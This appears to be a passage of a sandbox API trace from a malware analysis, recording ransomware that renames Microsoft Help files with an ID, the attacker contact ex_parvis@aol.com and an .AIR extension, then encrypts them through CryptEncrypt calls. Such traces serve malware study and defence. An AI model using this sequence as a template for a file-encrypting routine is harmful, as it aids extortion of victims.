	[0100.648] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.648] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.648] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.649] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned 61
	[0100.649] GetProcessHeap () returned 0x540000
	[0100.649] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe0) returned 0x601bd0
	[0100.649] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn"
	[0100.649] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.649] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.651] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.652] GetProcessHeap () returned 0x540000
	[0100.652] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0100.652] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=362) returned 1
	[0100.652] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x16a
	[0100.652] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.652] GetProcessHeap () returned 0x540000
	[0100.652] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.652] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.652] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.653] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.653] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.653] ReadFile (in: hFile=0x4c0, lpBuffer=0x597dc8, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597dc8*, lpNumberOfBytesRead=0x3a1f778*=0x16a, lpOverlapped=0x0) returned 1
	[0100.653] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-362, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.653] WriteFile (in: hFile=0x4c0, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x16a, lpOverlapped=0x0) returned 1
	[0100.653] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.653] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.653] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.654] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned 57
	[0100.654] GetProcessHeap () returned 0x540000
	[0100.654] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd8) returned 0x5919d0
	[0100.654] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn"
	[0100.654] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.654] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.657] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.657] GetProcessHeap () returned 0x540000
	[0100.657] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.657] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=338) returned 1
	[0100.657] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x152
	[0100.657] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.657] GetProcessHeap () returned 0x540000
	[0100.657] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.657] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.658] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.658] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.659] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.659] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x152, lpOverlapped=0x0) returned 1
	[0100.659] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.659] WriteFile (in: hFile=0x4c0, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x152, lpOverlapped=0x0) returned 1
	[0100.659] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.659] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.659] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.660] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned 57
	[0100.660] GetProcessHeap () returned 0x540000
	[0100.660] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd8) returned 0x5919d0
	[0100.660] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn"
	[0100.660] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.660] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.662] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.662] GetProcessHeap () returned 0x540000
	[0100.662] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.662] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=338) returned 1
	[0100.662] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x152
	[0100.662] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.662] GetProcessHeap () returned 0x540000
	[0100.662] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.662] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.662] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.663] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.663] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.663] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x152, lpOverlapped=0x0) returned 1
	[0100.663] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.664] WriteFile (in: hFile=0x4c0, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x152, lpOverlapped=0x0) returned 1
	[0100.664] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.664] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.664] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.665] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn") returned 53
	[0100.665] GetProcessHeap () returned 0x540000
	[0100.665] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd0) returned 0x59d258
	[0100.665] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn"
	[0100.665] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.665] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.668] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.668] GetProcessHeap () returned 0x540000
	[0100.668] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0100.668] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=314) returned 1
	[0100.668] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x13a
	[0100.668] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.668] GetProcessHeap () returned 0x540000
	[0100.668] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.668] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.668] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.669] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.669] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.669] ReadFile (in: hFile=0x4c0, lpBuffer=0x5947d8, nNumberOfBytesToRead=0x13a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5947d8*, lpNumberOfBytesRead=0x3a1f778*=0x13a, lpOverlapped=0x0) returned 1
	[0100.669] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-314, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.669] WriteFile (in: hFile=0x4c0, lpBuffer=0x594690*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x594690*, lpNumberOfBytesWritten=0x3a1f778*=0x13a, lpOverlapped=0x0) returned 1
	[0100.670] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.670] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.670] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.670] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned 56
	[0100.670] GetProcessHeap () returned 0x540000
	[0100.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd6) returned 0x5919d0
	[0100.670] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn"
	[0100.670] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.670] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.674] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.674] GetProcessHeap () returned 0x540000
	[0100.674] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.674] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=332) returned 1
	[0100.674] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x14c
	[0100.674] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.674] GetProcessHeap () returned 0x540000
	[0100.674] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.674] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.675] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.676] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.676] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.676] ReadFile (in: hFile=0x4c0, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x14c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x14c, lpOverlapped=0x0) returned 1
	[0100.676] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-332, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.676] WriteFile (in: hFile=0x4c0, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x14c, lpOverlapped=0x0) returned 1
	[0100.676] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.676] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.676] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1
	[0100.677] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned 59
	[0100.677] GetProcessHeap () returned 0x540000
	[0100.677] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdc) returned 0x601bd0
	[0100.677] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn"
	[0100.677] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.677] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
